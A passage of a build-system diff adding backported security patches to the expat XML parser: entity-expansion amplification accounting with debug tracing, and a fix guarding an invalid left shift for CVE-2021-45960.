+     role = XmlTokenRole(&parser->m_prologState, tok, s, next, enc);
++#ifdef XML_DTD
++    switch (role) {
++    case XML_ROLE_INSTANCE_START: // bytes accounted in contentProcessor
++    case XML_ROLE_XML_DECL:       // bytes accounted in processXmlDecl
++    case XML_ROLE_TEXT_DECL:      // bytes accounted in processXmlDecl
++      break;
++    default:
++      if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++        accountingOnAbort(parser);
++        return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++      }
++    }
++#endif
+     switch (role) {
+     case XML_ROLE_XML_DECL: {
+       enum XML_Error result = processXmlDecl(parser, 0, s, next);
+@@ -4464,7 +4683,8 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+         const XML_Char *attVal;
+         enum XML_Error result = storeAttributeValue(
+             parser, enc, parser->m_declAttributeIsCdata,
+-            s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool);
++            s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool,
++            XML_ACCOUNT_NONE);
+         if (result)
+           return result;
+         attVal = poolStart(&dtd->pool);
+@@ -4497,8 +4717,9 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+       break;
+     case XML_ROLE_ENTITY_VALUE:
+       if (dtd->keepProcessing) {
+-        enum XML_Error result = storeEntityValue(
+-            parser, enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
++        enum XML_Error result
++            = storeEntityValue(parser, enc, s + enc->minBytesPerChar,
++                               next - enc->minBytesPerChar, XML_ACCOUNT_NONE);
+         if (parser->m_declEntity) {
+           parser->m_declEntity->textPtr = poolStart(&dtd->entityValuePool);
+           parser->m_declEntity->textLen
+@@ -4888,12 +5109,15 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+         if (parser->m_externalEntityRefHandler) {
+           dtd->paramEntityRead = XML_FALSE;
+           entity->open = XML_TRUE;
++          entityTrackingOnOpen(parser, entity, __LINE__);
+           if (! parser->m_externalEntityRefHandler(
+                   parser->m_externalEntityRefHandlerArg, 0, entity->base,
+                   entity->systemId, entity->publicId)) {
++            entityTrackingOnClose(parser, entity, __LINE__);
+             entity->open = XML_FALSE;
+             return XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+           }
++          entityTrackingOnClose(parser, entity, __LINE__);
+           entity->open = XML_FALSE;
+           handleDefault = XML_FALSE;
+           if (! dtd->paramEntityRead) {
+@@ -5091,6 +5315,13 @@ epilogProcessor(XML_Parser parser, const char *s, const char *end,
+   for (;;) {
+     const char *next = NULL;
+     int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
++#ifdef XML_DTD
++    if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++                                  XML_ACCOUNT_DIRECT)) {
++      accountingOnAbort(parser);
++      return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++    }
++#endif
+     parser->m_eventEndPtr = next;
+     switch (tok) {
+     /* report partial linebreak - it might be the last token */
+@@ -5164,6 +5395,9 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+       return XML_ERROR_NO_MEMORY;
+   }
+   entity->open = XML_TRUE;
++#ifdef XML_DTD
++  entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+   entity->processed = 0;
+   openEntity->next = parser->m_openInternalEntities;
+   parser->m_openInternalEntities = openEntity;
+@@ -5182,17 +5416,22 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+     int tok
+         = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+     result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+-                      tok, next, &next, XML_FALSE, XML_FALSE);
++                      tok, next, &next, XML_FALSE, XML_FALSE,
++                      XML_ACCOUNT_ENTITY_EXPANSION);
+   } else
+ #endif /* XML_DTD */
+     result = doContent(parser, parser->m_tagLevel, parser->m_internalEncoding,
+-                       textStart, textEnd, &next, XML_FALSE);
++                       textStart, textEnd, &next, XML_FALSE,
++                       XML_ACCOUNT_ENTITY_EXPANSION);
+ 
+   if (result == XML_ERROR_NONE) {
+     if (textEnd != next && parser->m_parsingStatus.parsing == XML_SUSPENDED) {
+       entity->processed = (int)(next - textStart);
+       parser->m_processor = internalEntityProcessor;
+     } else {
++#ifdef XML_DTD
++      entityTrackingOnClose(parser, entity, __LINE__);
++#endif /* XML_DTD */
+       entity->open = XML_FALSE;
+       parser->m_openInternalEntities = openEntity->next;
+       /* put openEntity back in list of free instances */
+@@ -5225,12 +5464,13 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+     int tok
+         = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+     result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+-                      tok, next, &next, XML_FALSE, XML_TRUE);
++                      tok, next, &next, XML_FALSE, XML_TRUE,
++                      XML_ACCOUNT_ENTITY_EXPANSION);
+   } else
+ #endif /* XML_DTD */
+     result = doContent(parser, openEntity->startTagLevel,
+                        parser->m_internalEncoding, textStart, textEnd, &next,
+-                       XML_FALSE);
++                       XML_FALSE, XML_ACCOUNT_ENTITY_EXPANSION);
+ 
+   if (result != XML_ERROR_NONE)
+     return result;
+@@ -5239,6 +5479,9 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+     entity->processed = (int)(next - (char *)entity->textPtr);
+     return result;
+   } else {
++#ifdef XML_DTD
++    entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+     entity->open = XML_FALSE;
+     parser->m_openInternalEntities = openEntity->next;
+     /* put openEntity back in list of free instances */
+@@ -5252,7 +5495,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+     parser->m_processor = prologProcessor;
+     tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+     return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+-                    (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++                    (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++                    XML_ACCOUNT_DIRECT);
+   } else
+ #endif /* XML_DTD */
+   {
+@@ -5260,7 +5504,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+     /* see externalEntityContentProcessor vs contentProcessor */
+     return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+                      s, end, nextPtr,
+-                     (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++                     (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++                     XML_ACCOUNT_DIRECT);
+   }
+ }
+ 
+@@ -5275,9 +5520,10 @@ errorProcessor(XML_Parser parser, const char *s, const char *end,
+ 
+ static enum XML_Error
+ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+-                    const char *ptr, const char *end, STRING_POOL *pool) {
++                    const char *ptr, const char *end, STRING_POOL *pool,
++                    enum XML_Account account) {
+   enum XML_Error result
+-      = appendAttributeValue(parser, enc, isCdata, ptr, end, pool);
++      = appendAttributeValue(parser, enc, isCdata, ptr, end, pool, account);
+   if (result)
+     return result;
+   if (! isCdata && poolLength(pool) && poolLastChar(pool) == 0x20)
+@@ -5289,11 +5535,22 @@ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ 
+ static enum XML_Error
+ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+-                     const char *ptr, const char *end, STRING_POOL *pool) {
++                     const char *ptr, const char *end, STRING_POOL *pool,
++                     enum XML_Account account) {
+   DTD *const dtd = parser->m_dtd; /* save one level of indirection */
++#ifndef XML_DTD
++  UNUSED_P(account);
++#endif
++
+   for (;;) {
+     const char *next;
+     int tok = XmlAttributeValueTok(enc, ptr, end, &next);
++#ifdef XML_DTD
++    if (! accountingDiffTolerated(parser, tok, ptr, next, __LINE__, account)) {
++      accountingOnAbort(parser);
++      return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++    }
++#endif
+     switch (tok) {
+     case XML_TOK_NONE:
+       return XML_ERROR_NONE;
+@@ -5353,6 +5610,14 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+       XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+           enc, ptr + enc->minBytesPerChar, next - enc->minBytesPerChar);
+       if (ch) {
++#ifdef XML_DTD
++        /* NOTE: We are replacing 4-6 characters original input for 1 character
++         *       so there is no amplification and hence recording without
++         *       protection. */
++        accountingDiffTolerated(parser, tok, (char *)&ch,
++                                ((char *)&ch) + sizeof(XML_Char), __LINE__,
++                                XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+         if (! poolAppendChar(pool, ch))
+           return XML_ERROR_NO_MEMORY;
+         break;
+@@ -5430,9 +5695,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+         enum XML_Error result;
+         const XML_Char *textEnd = entity->textPtr + entity->textLen;
+         entity->open = XML_TRUE;
++#ifdef XML_DTD
++        entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+         result = appendAttributeValue(parser, parser->m_internalEncoding,
+-                                      isCdata, (char *)entity->textPtr,
+-                                      (char *)textEnd, pool);
++                                      isCdata, (const char *)entity->textPtr,
++                                      (const char *)textEnd, pool,
++                                      XML_ACCOUNT_ENTITY_EXPANSION);
++#ifdef XML_DTD
++        entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+         entity->open = XML_FALSE;
+         if (result)
+           return result;
+@@ -5462,13 +5734,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ 
+ static enum XML_Error
+ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+-                 const char *entityTextPtr, const char *entityTextEnd) {
++                 const char *entityTextPtr, const char *entityTextEnd,
++                 enum XML_Account account) {
+   DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+   STRING_POOL *pool = &(dtd->entityValuePool);
+   enum XML_Error result = XML_ERROR_NONE;
+ #ifdef XML_DTD
+   int oldInEntityValue = parser->m_prologState.inEntityValue;
+   parser->m_prologState.inEntityValue = 1;
++#else
++  UNUSED_P(account);
+ #endif /* XML_DTD */
+   /* never return Null for the value argument in EntityDeclHandler,
+      since this would indicate an external entity; therefore we
+@@ -5481,6 +5756,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+   for (;;) {
+     const char *next;
+     int tok = XmlEntityValueTok(enc, entityTextPtr, entityTextEnd, &next);
++
++#ifdef XML_DTD
++    if (! accountingDiffTolerated(parser, tok, entityTextPtr, next, __LINE__,
++                                  account)) {
++      accountingOnAbort(parser);
++      result = XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++      goto endEntityValue;
++    }
++#endif
++
+     switch (tok) {
+     case XML_TOK_PARAM_ENTITY_REF:
+ #ifdef XML_DTD
+@@ -5516,13 +5801,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+           if (parser->m_externalEntityRefHandler) {
+             dtd->paramEntityRead = XML_FALSE;
+             entity->open = XML_TRUE;
++            entityTrackingOnOpen(parser, entity, __LINE__);
+             if (! parser->m_externalEntityRefHandler(
+                     parser->m_externalEntityRefHandlerArg, 0, entity->base,
+                     entity->systemId, entity->publicId)) {
++              entityTrackingOnClose(parser, entity, __LINE__);
+               entity->open = XML_FALSE;
+               result = XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+               goto endEntityValue;
+             }
++            entityTrackingOnClose(parser, entity, __LINE__);
+             entity->open = XML_FALSE;
+             if (! dtd->paramEntityRead)
+               dtd->keepProcessing = dtd->standalone;
+@@ -5530,9 +5818,12 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+             dtd->keepProcessing = dtd->standalone;
+         } else {
+           entity->open = XML_TRUE;
++          entityTrackingOnOpen(parser, entity, __LINE__);
+           result = storeEntityValue(
+-              parser, parser->m_internalEncoding, (char *)entity->textPtr,
+-              (char *)(entity->textPtr + entity->textLen));
++              parser, parser->m_internalEncoding, (const char *)entity->textPtr,
++              (const char *)(entity->textPtr + entity->textLen),
++              XML_ACCOUNT_ENTITY_EXPANSION);
++          entityTrackingOnClose(parser, entity, __LINE__);
+           entity->open = XML_FALSE;
+           if (result)
+             goto endEntityValue;
+@@ -6893,3 +7184,741 @@ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+   memcpy(result, s, charsRequired * sizeof(XML_Char));
+   return result;
+ }
++
++#ifdef XML_DTD
++
++static float
++accountingGetCurrentAmplification(XML_Parser rootParser) {
++  const XmlBigCount countBytesOutput
++      = rootParser->m_accounting.countBytesDirect
++        + rootParser->m_accounting.countBytesIndirect;
++  const float amplificationFactor
++      = rootParser->m_accounting.countBytesDirect
++            ? (countBytesOutput
++               / (float)(rootParser->m_accounting.countBytesDirect))
++            : 1.0f;
++  assert(! rootParser->m_parentParser);
++  return amplificationFactor;
++}
++
++static void
++accountingReportStats(XML_Parser originParser, const char *epilog) {
++  const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++  assert(! rootParser->m_parentParser);
++
++  if (rootParser->m_accounting.debugLevel < 1) {
++    return;
++  }
++
++  const float amplificationFactor
++      = accountingGetCurrentAmplification(rootParser);
++  fprintf(stderr,
++          "expat: Accounting(%p): Direct " EXPAT_FMT_ULL(
++              "10") ", indirect " EXPAT_FMT_ULL("10") ", amplification %8.2f%s",
++          (void *)rootParser, rootParser->m_accounting.countBytesDirect,
++          rootParser->m_accounting.countBytesIndirect,
++          (double)amplificationFactor, epilog);
++}
++
++static void
++accountingOnAbort(XML_Parser originParser) {
++  accountingReportStats(originParser, " ABORTING\n");
++}
++
++static void
++accountingReportDiff(XML_Parser rootParser,
++                     unsigned int levelsAwayFromRootParser, const char *before,
++                     const char *after, ptrdiff_t bytesMore, int source_line,
++                     enum XML_Account account) {
++  assert(! rootParser->m_parentParser);
++
++  fprintf(stderr,
++          " (+" EXPAT_FMT_PTRDIFF_T("6") " bytes %s|%d, xmlparse.c:%d) %*s\"",
++          bytesMore, (account == XML_ACCOUNT_DIRECT) ? "DIR" : "EXP",
++          levelsAwayFromRootParser, source_line, 10, "");
++
++  const char ellipis[] = "[..]";
++  const size_t ellipsisLength = sizeof(ellipis) /* because compile-time */ - 1;
++  const unsigned int contextLength = 10;
++
++  /* Note: Performance is of no concern here */
++  const char *walker = before;
++  if ((rootParser->m_accounting.debugLevel >= 3)
++      || (after - before)
++             <= (ptrdiff_t)(contextLength + ellipsisLength + contextLength)) {
++    for (; walker < after; walker++) {
++      fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++    }
++  } else {
++    for (; walker < before + contextLength; walker++) {
++      fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++    }
++    fprintf(stderr, ellipis);
++    walker = after - contextLength;
++    for (; walker < after; walker++) {
++      fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++    }
++  }
++  fprintf(stderr, "\"\n");
++}
++
++static XML_Bool
++accountingDiffTolerated(XML_Parser originParser, int tok, const char *before,
++                        const char *after, int source_line,
++                        enum XML_Account account) {
++  /* Note: We need to check the token type *first* to be sure that
++   *       we can even access variable <after>, safely.
++   *       E.g. for XML_TOK_NONE <after> may hold an invalid pointer. */
++  switch (tok) {
++  case XML_TOK_INVALID:
++  case XML_TOK_PARTIAL:
++  case XML_TOK_PARTIAL_CHAR:
++  case XML_TOK_NONE:
++    return XML_TRUE;
++  }
++
++  if (account == XML_ACCOUNT_NONE)
++    return XML_TRUE; /* because these bytes have been accounted for, already */
++
++  unsigned int levelsAwayFromRootParser;
++  const XML_Parser rootParser
++      = getRootParserOf(originParser, &levelsAwayFromRootParser);
++  assert(! rootParser->m_parentParser);
++
++  const int isDirect
++      = (account == XML_ACCOUNT_DIRECT) && (originParser == rootParser);
++  const ptrdiff_t bytesMore = after - before;
++
++  XmlBigCount *const additionTarget
++      = isDirect ? &rootParser->m_accounting.countBytesDirect
++                 : &rootParser->m_accounting.countBytesIndirect;
++
++  /* Detect and avoid integer overflow */
++  if (*additionTarget > (XmlBigCount)(-1) - (XmlBigCount)bytesMore)
++    return XML_FALSE;
++  *additionTarget += bytesMore;
++
++  const XmlBigCount countBytesOutput
++      = rootParser->m_accounting.countBytesDirect
++        + rootParser->m_accounting.countBytesIndirect;
++  const float amplificationFactor
++      = accountingGetCurrentAmplification(rootParser);
++  const XML_Bool tolerated
++      = (countBytesOutput < rootParser->m_accounting.activationThresholdBytes)
++        || (amplificationFactor
++            <= rootParser->m_accounting.maximumAmplificationFactor);
++
++  if (rootParser->m_accounting.debugLevel >= 2) {
++    accountingReportStats(rootParser, "");
++    accountingReportDiff(rootParser, levelsAwayFromRootParser, before, after,
++                         bytesMore, source_line, account);
++  }
++
++  return tolerated;
++}
++
++static void
++entityTrackingReportStats(XML_Parser rootParser, ENTITY *entity,
++                          const char *action, int sourceLine) {
++  assert(! rootParser->m_parentParser);
++  if (rootParser->m_entity_stats.debugLevel < 1)
++    return;
++
++#  if defined(XML_UNICODE)
++  const char *const entityName = "[..]";
++#  else
++  const char *const entityName = entity->name;
++#  endif
++
++  fprintf(
++      stderr,
++      "expat: Entities(%p): Count %9d, depth %2d/%2d %*s%s%s; %s length %d (xmlparse.c:%d)\n",
++      (void *)rootParser, rootParser->m_entity_stats.countEverOpened,
++      rootParser->m_entity_stats.currentDepth,
++      rootParser->m_entity_stats.maximumDepthSeen,
++      (rootParser->m_entity_stats.currentDepth - 1) * 2, "",
++      entity->is_param ? "%" : "&", entityName, action, entity->textLen,
++      sourceLine);
++}
++
++static void
++entityTrackingOnOpen(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++  const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++  assert(! rootParser->m_parentParser);
++
++  rootParser->m_entity_stats.countEverOpened++;
++  rootParser->m_entity_stats.currentDepth++;
++  if (rootParser->m_entity_stats.currentDepth
++      > rootParser->m_entity_stats.maximumDepthSeen) {
++    rootParser->m_entity_stats.maximumDepthSeen++;
++  }
++
++  entityTrackingReportStats(rootParser, entity, "OPEN ", sourceLine);
++}
++
++static void
++entityTrackingOnClose(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++  const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++  assert(! rootParser->m_parentParser);
++
++  entityTrackingReportStats(rootParser, entity, "CLOSE", sourceLine);
++  rootParser->m_entity_stats.currentDepth--;
++}
++
++static XML_Parser
++getRootParserOf(XML_Parser parser, unsigned int *outLevelDiff) {
++  XML_Parser rootParser = parser;
++  unsigned int stepsTakenUpwards = 0;
++  while (rootParser->m_parentParser) {
++    rootParser = rootParser->m_parentParser;
++    stepsTakenUpwards++;
++  }
++  assert(! rootParser->m_parentParser);
++  if (outLevelDiff != NULL) {
++    *outLevelDiff = stepsTakenUpwards;
++  }
++  return rootParser;
++}
++
++static const char *
++unsignedCharToPrintable(unsigned char c) {
++  switch (c) {
++  case 0:
++    return "\\0";
++  case 1:
++    return "\\x1";
++  case 2:
++    return "\\x2";
++  case 3:
++    return "\\x3";
++  case 4:
++    return "\\x4";
++  case 5:
++    return "\\x5";
++  case 6:
++    return "\\x6";
++  case 7:
++    return "\\x7";
++  case 8:
++    return "\\x8";
++  case 9:
++    return "\\t";
++  case 10:
++    return "\\n";
++  case 11:
++    return "\\xB";
++  case 12:
++    return "\\xC";
++  case 13:
++    return "\\r";
++  case 14:
++    return "\\xE";
++  case 15:
++    return "\\xF";
++  case 16:
++    return "\\x10";
++  case 17:
++    return "\\x11";
++  case 18:
++    return "\\x12";
++  case 19:
++    return "\\x13";
++  case 20:
++    return "\\x14";
++  case 21:
++    return "\\x15";
++  case 22:
++    return "\\x16";
++  case 23:
++    return "\\x17";
++  case 24:
++    return "\\x18";
++  case 25:
++    return "\\x19";
++  case 26:
++    return "\\x1A";
++  case 27:
++    return "\\x1B";
++  case 28:
++    return "\\x1C";
++  case 29:
++    return "\\x1D";
++  case 30:
++    return "\\x1E";
++  case 31:
++    return "\\x1F";
++  case 32:
++    return " ";
++  case 33:
++    return "!";
++  case 34:
++    return "\\\"";
++  case 35:
++    return "#";
++  case 36:
++    return "$";
++  case 37:
++    return "%";
++  case 38:
++    return "&";
++  case 39:
++    return "'";
++  case 40:
++    return "(";
++  case 41:
++    return ")";
++  case 42:
++    return "*";
++  case 43:
++    return "+";
++  case 44:
++    return ",";
++  case 45:
++    return "-";
++  case 46:
++    return ".";
++  case 47:
++    return "/";
++  case 48:
++    return "0";
++  case 49:
++    return "1";
++  case 50:
++    return "2";
++  case 51:
++    return "3";
++  case 52:
++    return "4";
++  case 53:
++    return "5";
++  case 54:
++    return "6";
++  case 55:
++    return "7";
++  case 56:
++    return "8";
++  case 57:
++    return "9";
++  case 58:
++    return ":";
++  case 59:
++    return ";";
++  case 60:
++    return "<";
++  case 61:
++    return "=";
++  case 62:
++    return ">";
++  case 63:
++    return "?";
++  case 64:
++    return "@";
++  case 65:
++    return "A";
++  case 66:
++    return "B";
++  case 67:
++    return "C";
++  case 68:
++    return "D";
++  case 69:
++    return "E";
++  case 70:
++    return "F";
++  case 71:
++    return "G";
++  case 72:
++    return "H";
++  case 73:
++    return "I";
++  case 74:
++    return "J";
++  case 75:
++    return "K";
++  case 76:
++    return "L";
++  case 77:
++    return "M";
++  case 78:
++    return "N";
++  case 79:
++    return "O";
++  case 80:
++    return "P";
++  case 81:
++    return "Q";
++  case 82:
++    return "R";
++  case 83:
++    return "S";
++  case 84:
++    return "T";
++  case 85:
++    return "U";
++  case 86:
++    return "V";
++  case 87:
++    return "W";
++  case 88:
++    return "X";
++  case 89:
++    return "Y";
++  case 90:
++    return "Z";
++  case 91:
++    return "[";
++  case 92:
++    return "\\\\";
++  case 93:
++    return "]";
++  case 94:
++    return "^";
++  case 95:
++    return "_";
++  case 96:
++    return "`";
++  case 97:
++    return "a";
++  case 98:
++    return "b";
++  case 99:
++    return "c";
++  case 100:
++    return "d";
++  case 101:
++    return "e";
++  case 102:
++    return "f";
++  case 103:
++    return "g";
++  case 104:
++    return "h";
++  case 105:
++    return "i";
++  case 106:
++    return "j";
++  case 107:
++    return "k";
++  case 108:
++    return "l";
++  case 109:
++    return "m";
++  case 110:
++    return "n";
++  case 111:
++    return "o";
++  case 112:
++    return "p";
++  case 113:
++    return "q";
++  case 114:
++    return "r";
++  case 115:
++    return "s";
++  case 116:
++    return "t";
++  case 117:
++    return "u";
++  case 118:
++    return "v";
++  case 119:
++    return "w";
++  case 120:
++    return "x";
++  case 121:
++    return "y";
++  case 122:
++    return "z";
++  case 123:
++    return "{";
++  case 124:
++    return "|";
++  case 125:
++    return "}";
++  case 126:
++    return "~";
++  case 127:
++    return "\\x7F";
++  case 128:
++    return "\\x80";
++  case 129:
++    return "\\x81";
++  case 130:
++    return "\\x82";
++  case 131:
++    return "\\x83";
++  case 132:
++    return "\\x84";
++  case 133:
++    return "\\x85";
++  case 134:
++    return "\\x86";
++  case 135:
++    return "\\x87";
++  case 136:
++    return "\\x88";
++  case 137:
++    return "\\x89";
++  case 138:
++    return "\\x8A";
++  case 139:
++    return "\\x8B";
++  case 140:
++    return "\\x8C";
++  case 141:
++    return "\\x8D";
++  case 142:
++    return "\\x8E";
++  case 143:
++    return "\\x8F";
++  case 144:
++    return "\\x90";
++  case 145:
++    return "\\x91";
++  case 146:
++    return "\\x92";
++  case 147:
++    return "\\x93";
++  case 148:
++    return "\\x94";
++  case 149:
++    return "\\x95";
++  case 150:
++    return "\\x96";
++  case 151:
++    return "\\x97";
++  case 152:
++    return "\\x98";
++  case 153:
++    return "\\x99";
++  case 154:
++    return "\\x9A";
++  case 155:
++    return "\\x9B";
++  case 156:
++    return "\\x9C";
++  case 157:
++    return "\\x9D";
++  case 158:
++    return "\\x9E";
++  case 159:
++    return "\\x9F";
++  case 160:
++    return "\\xA0";
++  case 161:
++    return "\\xA1";
++  case 162:
++    return "\\xA2";
++  case 163:
++    return "\\xA3";
++  case 164:
++    return "\\xA4";
++  case 165:
++    return "\\xA5";
++  case 166:
++    return "\\xA6";
++  case 167:
++    return "\\xA7";
++  case 168:
++    return "\\xA8";
++  case 169:
++    return "\\xA9";
++  case 170:
++    return "\\xAA";
++  case 171:
++    return "\\xAB";
++  case 172:
++    return "\\xAC";
++  case 173:
++    return "\\xAD";
++  case 174:
++    return "\\xAE";
++  case 175:
++    return "\\xAF";
++  case 176:
++    return "\\xB0";
++  case 177:
++    return "\\xB1";
++  case 178:
++    return "\\xB2";
++  case 179:
++    return "\\xB3";
++  case 180:
++    return "\\xB4";
++  case 181:
++    return "\\xB5";
++  case 182:
++    return "\\xB6";
++  case 183:
++    return "\\xB7";
++  case 184:
++    return "\\xB8";
++  case 185:
++    return "\\xB9";
++  case 186:
++    return "\\xBA";
++  case 187:
++    return "\\xBB";
++  case 188:
++    return "\\xBC";
++  case 189:
++    return "\\xBD";
++  case 190:
++    return "\\xBE";
++  case 191:
++    return "\\xBF";
++  case 192:
++    return "\\xC0";
++  case 193:
++    return "\\xC1";
++  case 194:
++    return "\\xC2";
++  case 195:
++    return "\\xC3";
++  case 196:
++    return "\\xC4";
++  case 197:
++    return "\\xC5";
++  case 198:
++    return "\\xC6";
++  case 199:
++    return "\\xC7";
++  case 200:
++    return "\\xC8";
++  case 201:
++    return "\\xC9";
++  case 202:
++    return "\\xCA";
++  case 203:
++    return "\\xCB";
++  case 204:
++    return "\\xCC";
++  case 205:
++    return "\\xCD";
++  case 206:
++    return "\\xCE";
++  case 207:
++    return "\\xCF";
++  case 208:
++    return "\\xD0";
++  case 209:
++    return "\\xD1";
++  case 210:
++    return "\\xD2";
++  case 211:
++    return "\\xD3";
++  case 212:
++    return "\\xD4";
++  case 213:
++    return "\\xD5";
++  case 214:
++    return "\\xD6";
++  case 215:
++    return "\\xD7";
++  case 216:
++    return "\\xD8";
++  case 217:
++    return "\\xD9";
++  case 218:
++    return "\\xDA";
++  case 219:
++    return "\\xDB";
++  case 220:
++    return "\\xDC";
++  case 221:
++    return "\\xDD";
++  case 222:
++    return "\\xDE";
++  case 223:
++    return "\\xDF";
++  case 224:
++    return "\\xE0";
++  case 225:
++    return "\\xE1";
++  case 226:
++    return "\\xE2";
++  case 227:
++    return "\\xE3";
++  case 228:
++    return "\\xE4";
++  case 229:
++    return "\\xE5";
++  case 230:
++    return "\\xE6";
++  case 231:
++    return "\\xE7";
++  case 232:
++    return "\\xE8";
++  case 233:
++    return "\\xE9";
++  case 234:
++    return "\\xEA";
++  case 235:
++    return "\\xEB";
++  case 236:
++    return "\\xEC";
++  case 237:
++    return "\\xED";
++  case 238:
++    return "\\xEE";
++  case 239:
++    return "\\xEF";
++  case 240:
++    return "\\xF0";
++  case 241:
++    return "\\xF1";
++  case 242:
++    return "\\xF2";
++  case 243:
++    return "\\xF3";
++  case 244:
++    return "\\xF4";
++  case 245:
++    return "\\xF5";
++  case 246:
++    return "\\xF6";
++  case 247:
++    return "\\xF7";
++  case 248:
++    return "\\xF8";
++  case 249:
++    return "\\xF9";
++  case 250:
++    return "\\xFA";
++  case 251:
++    return "\\xFB";
++  case 252:
++    return "\\xFC";
++  case 253:
++    return "\\xFD";
++  case 254:
++    return "\\xFE";
++  case 255:
++    return "\\xFF";
++  default:
++    assert(0); /* never gets here */
++    return "dead code";
++  }
++  assert(0); /* never gets here */
++}
++
++#endif /* XML_DTD */
++
++static unsigned long
++getDebugLevel(const char *variableName, unsigned long defaultDebugLevel) {
++  const char *const valueOrNull = getenv(variableName);
++  if (valueOrNull == NULL) {
++    return defaultDebugLevel;
++  }
++  const char *const value = valueOrNull;
++
++  errno = 0;
++  char *afterValue = (char *)value;
++  unsigned long debugLevel = strtoul(value, &afterValue, 10);
++  if ((errno != 0) || (afterValue[0] != '\0')) {
++    errno = 0;
++    return defaultDebugLevel;
++  }
++
++  return debugLevel;
++}
+-- 
+2.32.0
+
diff --git a/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
new file mode 100644
index 0000000000..523449e22c
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
@@ -0,0 +1,65 @@
+From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 27 Dec 2021 20:15:02 +0100
+Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
+ storeAtts (CVE-2021-45960)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
+
+CVE: CVE-2021-45960
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
+ 1 file changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d730f41c3..b47c31b05 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+   if (nPrefixes) {
+     int j; /* hash table index */
+     unsigned long version = parser->m_nsAttsVersion;
+-    int nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++    /* Detect and prevent invalid shift */
++    if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
++      return XML_ERROR_NO_MEMORY;
++    }
++
++    unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
+     unsigned char oldNsAttsPower = parser->m_nsAttsPower;
+     /* size of hash table must be at least 2 * (# of prefixed attributes) */
+     if ((nPrefixes << 1)
